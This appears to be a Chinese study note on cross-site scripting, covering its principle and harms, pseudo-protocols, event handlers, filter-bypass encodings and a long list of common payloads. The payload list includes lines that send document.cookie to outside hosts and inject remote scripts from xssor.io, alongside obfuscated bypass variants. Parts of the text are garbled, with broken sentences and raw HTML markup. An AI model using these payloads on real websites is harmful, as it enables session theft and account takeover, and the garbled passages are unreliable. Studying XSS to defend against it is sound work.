鸡翅儿

XSS漏洞学习

XSS漏洞的原理

XSS漏洞是发生在目标网站中目标用户的浏览层面上，当用户浏览器渲染整个HTML文档的过程中，出现了不被预期的脚本指令并执行时，XSS就会发生。

XSS漏洞的危害

获取用户或者管理员的Cookie
XSS蠕虫
钓鱼攻击
挂马
键盘记录等

以下是可能嵌入跨源的资源的一些示例：

标签嵌入跨域脚本。语法错误信息只能在同浪脚本中捕
则，CSS的跨域需要一个设置正确的 Content－Type消息头。不同浏览器有不同的限
制：IE， Firefox， Chrome， Safari（跳至CVE－2010－0051）部分和 Opera
嵌入图片。支持的图片格式包括PNG，JPEG，GlF，BMP，SVG，
，和
的插件
@font-face引入的字体。一些浏览器允许跨域字体（ cross－origin fonts），一些需要同
源字体（ same－origin fonts）
和载入的任何资源。站点可以使用 X-frame-optionsi消息头来阻止这<br> 种形式的跨域交互。</li> <li><svg> 标签中可直接执行实体字符</li> </ul> <h4>伪协议</h4> <p>伪协议不同于因特网上所真实存在的协议，如http://，https://，ftp://，而是为关联应用程序而使用的。如:<code>tencent://</code>(关联QQ)，<code>data:</code>(用base64编码来在浏览器端输出二进制文件)，还有就是<code>javascript:[code]</code>我们可以在浏览地址栏里输入"javascript:alert('JS!');"，点转到后会发现，实际上是把javascript: 后面的代码当JavaScript来执行，并将结果值返回给当前页面。（XSS Changes Stage #8）<br> 通常只有引用文件的属性才能触发跨站脚本</p> <pre><code>href= lowsrc= bgsound= background= value= action= dynsrc= </code></pre> <h4>HTML 事件</h4> <p>JavaScript 与 HTML 之间的交互是通过事件来实现的，事件是用户或浏览器自身执行的某种动作，比如 click，mouseover，load 等，响应事件的函数叫事件处理函数（或事件侦听器）。<br> 例如：<code><img src="#" onerror=alert(/xss/)></code>ux<br> 可用来测试事件型的跨站脚本的事件</p> <pre><code>onResume onReverse onRowDelete onRowInserted onSeek onSynchRestored onTimeError onTrackChange onURLFlip onMediaComplete onerrorupdate onrowenter ....... </code></pre> <h4>XSS 绕过</h4> <ul> <li>基于黑名单绕过 JavaScript 敏感字段</li> </ul> <blockquote> <p>可利用空格，回车和 TAB 键进行绕过<br> <img src="javas cript:alert(/xss/)"><br> 注：javas 与 cript 之间不是空格，是 <code>Tab</code> 键，同时也可用<code>回车符</code>进行拆分关键字</p> </blockquote> <ul> <li>Unicode编码绕过</li> </ul> <blockquote> <p><img src="x" onerror="alert("xss");"><br> <img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')"></p> </blockquote> <ul> <li>url 编码绕过</li> </ul> <blockquote> <p><img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"></p> <p><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
- Ascii码绕过
- hex绕过
- 八进制
- base64绕过
</p> </blockquote> <ul> <li>过滤（）圆括号<br> 可以使用反引号代替圆括号</li> </ul> <blockquote> <p><img src=x onerror=alert`1`></p> </blockquote> <p>引入伪协议，以及location，然后进行编码拆分。</p> <blockquote> <p><img src=1 onerror=alert%28%29><br> <img src=1 onerror=location="javascript:"+"aler"+"t%281%29"></p> </blockquote> <h4>XSS 常用 payload</h4> <pre><code>>"' '';!--"<XSS>=&{()} '';!--"<script>alert(0);</script>=&{()} '';!--"<script>alert(0);</script>=&{(alert(1))} `><script>alert(0)</script> <script>a=eval;b=alert;a(b(/i/.source));</script> <code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code> <script src=http://xssor.io/xss.js></SCRIPT> <script>location.href='http://127.0.0.1:8088/cookie.php?cookie='+escape(document.cookie);</script> '"><img onerror=alert(0) src=><"' <img src=http://127.0.0.1/myspace.asp> <img src=javascr	ipt:alert(0)> <img src=javascr	ipt:i="x=document.createElement('script');x.src='http://xssor.io/xn.js';x.defer=true;document.getElementsByTagName('head')[0].appendChild(x)";execScript(i)> <img src=javascr	ipt:i="x=document.createElement('\u0053\u0043\u0052\u0049\u0050\u0054');x.src='http://xssor.io/xn.js';x.defer=true;document.getElementsByTagName('head')[0].appendChild(x)";execScript(i)> new Image().src="http://xssor.io/phishing/cookie.asp?cookie="+escape(document.cookie); <iframe src=http://www.baidu.com/> body{xxx:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))} a{xxx:expression(if(!window.x){alert('xss');window.x=1;})} a{xxx:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29} body{background:url("javascript:alert('xss')")} body{background:url(JavAs cr ipt:alert(0))} @i\6d\70o\72\74'javascr\ipt:alert(document.cookie)';
alert(String(/xss/).substr(1,3)) alert(/xss/.source) Test x='\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)() Test Test